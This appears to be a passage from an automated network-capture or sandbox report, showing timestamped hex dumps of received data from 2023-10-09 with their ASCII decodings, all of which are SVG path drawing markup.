                                                                                                                                                                                                                                                        Data Ascii: 77,225.59a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M49.47,216.82a2.17,2.17,0,0,1-1,2.82,3.17,3.17,0,0,1-4.22-1.19,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3
                                                                                                                                                                                                                                                        2023-10-09 13:51:00 UTC2112INData Raw: 22 20 64 3d 22 4d 38 38 2e 34 32 2c 33 31 32 2e 31 38 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 38 38 2e 31 32 2c 33 30 33 2e 34 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 41 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2c 38 32 2e 39 2c 33 30 35 61 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30
                                                                                                                                                                                                                                                        Data Ascii: " d="M88.42,312.18a2.18,2.18,0,0,1-1,2.82,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"></path><path class="cls-7" d="M88.12,303.4a2.19,2.19,0,0,1-1,2.83A3.2,3.2,0,0,1,82.9,305a3,3,0,0,1,.65-3.65,2.86,2.86,0
                                                                                                                                                                                                                                                        2023-10-09 13:51:00 UTC2128INData Raw: 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 30 39 2e 38 33 2c 31 35 33 2e 32 35 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20
                                                                                                                                                                                                                                                        Data Ascii: 1,.65-3.66,2.84,2.84,0,0,1,3.66.05,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M109.83,153.25a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67.05,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7"
                                                                                                                                                                                                                                                        2023-10-09 13:51:00 UTC2144INData Raw: 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 34 38 2e 37 37 2c 32 34 38 2e 36 31 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 34 38 2e 34 37 2c 32 33 39 2e 38 33 61
                                                                                                                                                                                                                                                        Data Ascii: 2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M148.77,248.61a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M148.47,239.83a
                                                                                                                                                                                                                                                        2023-10-09 13:51:00 UTC2160INData Raw: 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 37 30 2e 34 38 2c 39 38 2e 34 36 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 37 30 2e 31 38 2c 38 39 2e 36 39 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32
                                                                                                                                                                                                                                                        Data Ascii: 69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M170.48,98.46a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M170.18,89.69a2.16,2.16,0,0,1-1,2.82
                                                                                                                                                                                                                                                        2023-10-09 13:51:00 UTC2176INData Raw: 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 30 39 2e 34 32 2c 31 39 33 2e 38 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 30 39 2e 31 33 2c 31 38 35 2e 30 35 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38
                                                                                                                                                                                                                                                        Data Ascii: ,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M209.42,193.82a2.17,2.17,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"></path><path class="cls-7" d="M209.13,185.05a2.17,2.17,0,0,1-1,2.82,3.18
                                                                                                                                                                                                                                                        2023-10-09 13:51:00 UTC2192INData Raw: 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 34 38 2e 33 37 2c 32 38 39 2e 31 38 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 34 38 2e 30 37 2c 32 38 30 2e 34 31 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 37 2c 33 2e 31 37
                                                                                                                                                                                                                                                        Data Ascii: 9,0,0,1,.2,3.62"></path><path class="cls-7" d="M248.37,289.18a2.18,2.18,0,0,1-1,2.83,3.17,3.17,0,0,1-4.22-1.19,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M248.07,280.41a2.16,2.16,0,0,1-1,2.82,3.17,3.17
                                                                                                                                                                                                                                                        2023-10-09 13:51:00 UTC2208INData Raw: 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 37 30 2e 30 38 2c 31 33 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 36 39 2e 37 38 2c 31 33 30 2e 32 36 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d
                                                                                                                                                                                                                                                        Data Ascii: "></path><path class="cls-7" d="M270.08,139a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M269.78,130.26a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-
                                                                                                                                                                                                                                                        2023-10-09 13:51:00 UTC2224INData Raw: 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 30 39 2c 32 33 34 2e 34 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 30 38 2e 37 32 2c 32 32 35 2e 36 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31
                                                                                                                                                                                                                                                        Data Ascii: h><path class="cls-7" d="M309,234.4a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3,3,0,0,1,.65-3.66,2.84,2.84,0,0,1,3.66,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M308.72,225.62a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1
                                                                                                                                                                                                                                                        2023-10-09 13:51:00 UTC2240INData Raw: 3d 22 4d 33 33 30 2e 37 33 2c 38 34 2e 32 35 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 37 2c 32 2e 38 37 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 34 37 2e 36 37 2c 33 32 31 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32
                                                                                                                                                                                                                                                        Data Ascii: ="M330.73,84.25a2.18,2.18,0,0,1-1,2.83,3.17,3.17,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.87,2.87,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M347.67,321a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2
                                                                                                                                                                                                                                                        2023-10-09 13:51:00 UTC2256INData Raw: 20 64 3d 22 4d 33 36 39 2e 36 37 2c 31 37 39 2e 36 31 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 37 2c 32 2e 38 37 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 36 39 2e 33 38 2c 31 37 30 2e 38 33 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32
                                                                                                                                                                                                                                                        Data Ascii: d="M369.67,179.61a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.66,2.87,2.87,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"></path><path class="cls-7" d="M369.38,170.83a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2
                                                                                                                                                                                                                                                        2023-10-09 13:51:00 UTC2272INData Raw: 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 31 31 2e 37 2c 33 33 39 2e 31 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d
                                                                                                                                                                                                                                                        Data Ascii: 09,2.81,2.81,0,0,1,.59-3.37,2.64,2.64,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M311.7,339.13a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.18,3.32"></path><path class=
                                                                                                                                                                                                                                                        2023-10-09 13:51:00 UTC2288INData Raw: 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 31 2e 34 2c 31 39 32 2e 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 31 2e 31 33 2c 31 38 34 2e 38 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38
                                                                                                                                                                                                                                                        Data Ascii: 3.32"></path><path class="cls-9" d="M331.4,192.9a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.47,2.47,0,0,1,.18,3.33"></path><path class="cls-9" d="M331.13,184.83a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8
                                                                                                                                                                                                                                                        2023-10-09 13:51:00 UTC2304INData Raw: 36 37 2c 32 37 32 2e 35 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 36 2e 36 39 2c 32 36 34 2e 34 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33
                                                                                                                                                                                                                                                        Data Ascii: 67,272.57a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.63,2.63,0,0,1,3.37,0,2.48,2.48,0,0,1,.19,3.33"></path><path class="cls-9" d="M366.69,264.49a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.59-3.37,2.63,2.63,0,0,1,3
                                                                                                                                                                                                                                                        2023-10-09 13:51:00 UTC2320INData Raw: 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 32 2e 32 35 2c 33 34 34 2e 31 36 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 32 2c 33 33 36 2e 30 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32
                                                                                                                                                                                                                                                        Data Ascii: ,3.37,0,2.45,2.45,0,0,1,.19,3.32"></path><path class="cls-9" d="M402.25,344.16a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M402,336.08a2,2,0,0,1-.9,2.6,2
                                                                                                                                                                                                                                                        2023-10-09 13:51:00 UTC2336INData Raw: 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 32 31 2e 36 37 2c 31 38 39 2e 38 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61
                                                                                                                                                                                                                                                        Data Ascii: -3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M421.67,189.85a2,2,0,0,1-.9,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.59-3.37,2.64,2.64,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><pa
                                                                                                                                                                                                                                                        2023-10-09 13:51:00 UTC2352INData Raw: 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 35 37 2e 32 33 2c 32 36 39 2e 35 31 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 31 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 35 37 2c 32 36 31 2e 34 34 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c
                                                                                                                                                                                                                                                        Data Ascii: "></path><path class="cls-9" d="M457.23,269.51a2,2,0,0,1-.9,2.61,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M457,261.44a2,2,0,0,1-.91,2.6,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,
                                                                                                                                                                                                                                                        2023-10-09 13:51:01 UTC2368INData Raw: 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 39 32 2e 35 32 2c 33 34 31 2e 31 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 39 32 2e 32 35 2c 33 33 33 61 32 2c 32 2c 30 2c 30
                                                                                                                                                                                                                                                        Data Ascii: ,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M492.52,341.1a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,1,3.37,0,2.47,2.47,0,0,1,.19,3.33"></path><path class="cls-9" d="M492.25,333a2,2,0,0
